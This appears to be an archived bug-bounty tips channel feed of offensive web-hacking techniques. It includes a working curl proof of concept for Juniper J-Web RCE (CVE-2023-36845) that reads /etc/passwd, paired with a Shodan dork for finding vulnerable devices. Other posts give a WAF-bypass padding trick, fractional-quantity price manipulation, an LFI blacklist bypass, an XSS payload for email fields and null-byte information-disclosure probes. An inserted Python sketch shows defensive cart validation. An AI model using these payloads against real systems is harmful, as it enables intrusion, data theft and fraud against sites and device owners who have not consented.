Bug bounty Tips
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
Post archive
5 857
Join my WhatsApp channel on hacking and tech tips https://whatsapp.com/channel/0029Va9Xem2EQIakni6dZp1A
5 857
Juniper J-Web - Remote Code Execution 🔥 - CVE-2023-36845
Nearly 14,000 Juniper devices are affected, as a search on Shodan shows:
Dork : title:"Juniper" http.favicon.hash:2141724739
PoC:
curl <TARGET> -F $'auto_prepend_file="/etc/passwd\n"' -F 'PHPRC=/dev/fd/0'
Here is a vulnerability scanner that has been specially developed to spot this vulnerability, or you can also use Nuclei:
https://lnkd.in/gEQrmXev
For more information:
https://lnkd.in/gRP3uXTm
#hacker_bano_chutiya_nhe
5 857
#bugbountytips Having trouble with a WAF? For POST/PUT/PATCH requests, try inserting a useless parameter with between 8KB and 10MB of random data BEFORE your malicious payload.
Many WAFs stop processing after X payload characters, allowing anything AFTER that through the WAF.
Use this website frequently to generate the easy-to-insert payloads (copy and paste):
https://onlinefiletools.com/generate-random-text-file
Credit : ZwinK
5 857
OS Command Injection 🕸🔖
Allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application.
This leads to fully compromising the application and all its data.
Thread 🧵 : 👇
https://twitter.com/Aacle_/status/1629700693530640385?s=20
5 857
Price Manipulation Method
If the product price parameter cannot be changed, change the quantity of products.
items[1][quantity]=1 --> 234 €
items[1][quantity]=0.1 --> 23.4 €
#bugbountytips #bugbountytip #bugbounty #cybersecurity #ethicalhacking
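Seen from the server side, the tip above works when the checkout multiplies the price by whatever number the client sends. The sketch below is an added example, not code from the channel; the price table, the quantity limit and all function names are assumptions. It sets that flawed total beside a hardened one that takes the price from the server, accepts only whole quantities, and refuses anything else.

```python
import re
from decimal import Decimal
from urllib.parse import parse_qsl

# Assumed server-side price list in integer cents; line "1" is the 234 EUR item from the post.
PRICE_CENTS = {"1": 23400}
MAX_QUANTITY = 100  # assumed business limit per cart line
ITEM_KEY = re.compile(r"items\[(\w+)\]\[quantity\]")
WHOLE_NUMBER = re.compile(r"[1-9][0-9]{0,5}")  # ASCII digits only: no sign, dot or exponent


class InvalidOrder(ValueError):
    """Raised when a cart field fails validation; the order is refused, not repaired."""


def naive_total_cents(body: str) -> Decimal:
    """Flawed pattern behind the tip: any number the client sends is multiplied in."""
    total = Decimal(0)
    for key, value in parse_qsl(body, keep_blank_values=True):
        match = ITEM_KEY.fullmatch(key)
        if match:
            total += PRICE_CENTS[match.group(1)] * Decimal(value)
    return total


def parse_quantity(raw: str) -> int:
    """Accept only a whole number from 1 to MAX_QUANTITY."""
    if not WHOLE_NUMBER.fullmatch(raw):
        raise InvalidOrder(f"quantity must be a whole number >= 1, got {raw!r}")
    quantity = int(raw)
    if quantity > MAX_QUANTITY:
        raise InvalidOrder(f"quantity {quantity} exceeds limit {MAX_QUANTITY}")
    return quantity


def order_total_cents(body: str) -> int:
    """Hardened total: known lines only, no duplicate keys, integer arithmetic."""
    total, seen = 0, set()
    for key, value in parse_qsl(body, keep_blank_values=True):
        match = ITEM_KEY.fullmatch(key)
        if not match:
            continue  # fields unrelated to quantities are ignored here
        line = match.group(1)
        if line not in PRICE_CENTS or line in seen:
            raise InvalidOrder(f"unknown or repeated cart line {line!r}")
        seen.add(line)
        total += PRICE_CENTS[line] * parse_quantity(value)
    if not seen:
        raise InvalidOrder("order contains no items")
    return total
```

Rejecting a repeated key also closes the case where two `items[1][quantity]` fields are sent and different layers pick different ones.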
5 857
Check out this series on SSRF, exploring the canvas and accessing internal pages: https://book.cipherops.tech/bug-bounty-notes/web-application/understanding-ssrf-vulnerabilities-and-their-impact/exploring-the-canvas-common-exploits-for-accessing-internal-pages
5 857
Check out these top YouTube channels to learn hacking: https://book.cipherops.tech/bug-bounty-notes/overview/lets-start/resources/stay-one-step-ahead-of-hackers-discover-the-ultimate-cybersecurity-youtube-channels
5 857
Recon is the key, and below is a good tip created for you:
1 - Collect your target IP ranges
2 - Go to the Censys search engine
3 - Run: ip=Target_range/XX
4 - Looking for a specific status code? Run this: ip=Target_range/XX and services.http.response.status_code=200
5 857
Browser-Based application LFI
file:///etc/passwd blacklisted? Use "view-source:file:///etc/passwd"
"view-source" is often forgotten by developers in blacklists.
#BugBounty #BugBountyTip #BugBountyTips
5 857
Tips 🌿🌻🍂
Whenever you see any email input field!
70% of bug hunters don't try XSS there, compared to the name field.
Always try this in the email input field!
"<img/src/onerror=alert(0)"@xss.com
This doesn't work every time, but give it a try; found 2 XSS today using this!
Tips 🌿🌻🍂 👆
5 857
To find information disclosure vulnerabilities, change the headers
- Change the Accept header to:
- Also try sending a null byte, like
GET /%00
If error handling is not done properly, this reveals server version information, stack and route information
#bugbounty #bugbountytip
5 857
I am working on a collection of a series of SSRF vulnerability exploits; maybe I will release it soon with an update.
5 857
Check out this SSRF blog, which I took from a HackerOne report and also made some small changes to, adding tips and all. I hope you guys like the update. https://book.cipherops.tech/bug-bounty-notes/web-application/understanding-ssrf-vulnerabilities-and-their-impact
5 857
Learn:
· Web Application Security
· Vulnerability Analysis
· Reconnaissance Techniques
Think:
· Like an Attacker
· Outside the Box
· Security First
Create:
· Detailed Reports
· Proof-of-Concept Exploits
· A Safer Cyberspace
Watch how exciting your bug bounty hunting journey becomes. 🐛💻🔒 #BugBountyHunter